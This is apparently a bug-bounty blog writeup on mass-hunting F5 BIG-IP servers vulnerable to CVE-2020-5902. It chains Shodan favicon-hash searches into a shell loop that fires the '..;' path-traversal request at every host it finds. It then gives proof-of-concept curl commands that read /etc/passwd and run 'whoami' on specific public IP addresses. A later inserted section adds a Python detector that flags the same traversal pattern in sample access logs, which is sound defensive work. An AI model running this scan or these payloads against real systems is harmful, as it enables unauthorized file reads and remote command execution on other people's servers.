CVE-2020-5902 Mass Hunting with Shodan and FavFreak

Anon Tuttu Venus
3 min read · Jul 7, 2020


CVE-2020-5902

Google Dork : inurl:/tmui/login.jsp

Hey Guys!! It’s me Anon Tuttu Venus again with another writeup! [Just the second one :P]
I know this writeup is late.
Still, I wanted to note down the process I used for finding CVE-2020-5902.

I did all of this on my Kali Linux machine.

!!!!!!!!!SPOILER ALERT!!!!!!!!!!

Main Content:

We are going to use two commands.
I will explain how to run them without errors.

Prerequisites:

Shodan Premium ID required [API key]

Python3, pip3 and Go

Tools that need to be installed:

  1. FavFreak
  2. Shodan CLI
  3. Assetfinder
  4. httprobe

FavFreak is a new tool developed by Devansh Batham.

Writeup: https://medium.com/@Asm0d3us/weaponizing-favicon-ico-for-bugbounties-osint-and-what-not-ace3c214e139
How to set up FavFreak:

Original: https://github.com/devanshbatham/FavFreak

git clone https://github.com/devanshbatham/FavFreak
cd FavFreak
pip3 install -r requirements.txt

Shodan CLI is the command-line version of Shodan.io.
How to install and configure it:

  1. easy_install shodan
  2. shodan init YOUR_API_KEY

Original: https://cli.shodan.io/

Assetfinder, developed by @tomnomnom, is used to grab subdomains.

How to set up assetfinder:

Use the go get method, which is the easiest one:

go get -u github.com/tomnomnom/assetfinder

httprobe, developed by @tomnomnom, takes a list of domains and checks for working HTTP and HTTPS servers.

How to set up httprobe:

Use the go get method, which is the easiest one:

go get -u github.com/tomnomnom/httprobe

Once everything is installed, run the 1st command:

assetfinder -subs-only target.com | httprobe | python3 /root/Tools/FavFreak/favfreak.py -o output --shodan

/root/Tools: this is the directory where I have stored my tools [this may differ in your case].

Command breakdown:

assetfinder -subs-only target.com finds the subdomains of target.com

httprobe checks which of them answer on HTTP and HTTPS

--shodan makes FavFreak list the Shodan dorks (http.favicon.hash queries) for the favicons it found

Once the above command runs successfully we will get output similar to this:

Now copy each hash (without the [ ]), substitute it for <input hash>, and run the 2nd command:

shodan search http.favicon.hash:<input hash> --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host; do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui..." | grep -q root && printf "%s \033[0;31mVulnerable\033[0m\n" "$host" || printf "%s \033[0;32mNot Vulnerable\033[0m\n" "$host"; done

The output of this command shows, per host, whether the server is Vulnerable or Not Vulnerable.

If the output says Vulnerable, run the PoC.

Either use curl or load the URL directly in the browser.

Curl command:

curl -sk 'https://52.20.40.40/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
curl -sk 'https://35.226.53.127/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=whoami'

NOTE: There is a real chance of false positives (the grep for "root" is a weak signal), and a high chance of a DUPLICATE REPORT, since this CVE was hunted by many people.
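From the other side of the table: the same `/tmui/login.jsp/..;/` path that the checks above send is exactly what an F5 administrator or SOC should look for in the TMUI access logs. The script below is an added example (not part of the original writeup, and not an F5 tool): it parses a few constructed combined-format log lines, URL-decodes the request path so an encoded `..%3B` is not missed, and flags any /tmui/ request carrying a `..;` path-parameter traversal segment. The sample IPs, timestamps and log format are made up for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (combined log format); not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Jul/2020:10:12:01 +0000] "GET /tmui/login.jsp HTTP/1.1" 200 3120 "-" "Mozilla/5.0"
203.0.113.9 - - [07/Jul/2020:10:12:07 +0000] "GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1" 200 1840 "-" "curl/7.68.0"
198.51.100.4 - - [07/Jul/2020:10:13:44 +0000] "GET /tmui/login.jsp/..%3B/tmui/locallb/workspace/tmshCmd.jsp?command=whoami HTTP/1.1" 200 512 "-" "curl/7.68.0"
203.0.113.5 - - [07/Jul/2020:10:14:02 +0000] "GET /favicon.ico HTTP/1.1" 200 1150 "-" "Mozilla/5.0"
"""

# Minimal parser for the fields we need: client IP, timestamp, method, path, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# CVE-2020-5902 signature: a /tmui/ path containing a "..;" segment. The ';' is the
# Tomcat path-parameter delimiter that makes the traversal slip past the front-end check.
TRAVERSAL_RE = re.compile(r'/tmui/.*?\.\.;', re.IGNORECASE)


def parse_line(line):
    """Return a dict of the parsed fields, or None if the line is not a request line."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    # Decode percent-escapes once so "..%3B" and "..;" are treated alike.
    rec["path"] = unquote(rec["path"])
    rec["status"] = int(rec["status"])
    return rec


def is_tmui_traversal(path):
    """True if the (already decoded) path carries the TMUI '..;' traversal."""
    return bool(TRAVERSAL_RE.search(path))


def find_suspicious(log_text):
    """Return (ip, decoded_path, status) for every line matching the traversal pattern."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and is_tmui_traversal(rec["path"]):
            hits.append((rec["ip"], rec["path"], rec["status"]))
    return hits


if __name__ == "__main__":
    for ip, path, status in find_suspicious(SAMPLE_LOG):
        print(f"{ip} {status} {path}")
```

On the constructed sample this reports the two requests carrying the traversal (one plain, one with the semicolon percent-encoded) and ignores the ordinary login-page and favicon hits. A 200 status on such a request is the line to escalate; a 404 or 403 on the same pattern still tells you someone is scanning for the bug.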

Happy Hunting !!

I have seen that some people struggle to set up Go on a Linux machine.

Steps to set up Go:

  1. Download Go from the official website: https://golang.org/dl/go1.14.4.linux-amd64.tar.gz
  2. cd /root/Download [assuming this is your download location]
  3. tar -C /usr/local/ -xvf go1.14.4.linux-amd64.tar.gz
  4. vim ~/.bashrc
  5. Add the following lines:
    export GOPATH=/root/go-workspace
    export GOROOT=/usr/local/go
    PATH=$PATH:$GOROOT/bin/:$GOPATH/bin
  6. source ~/.bashrc
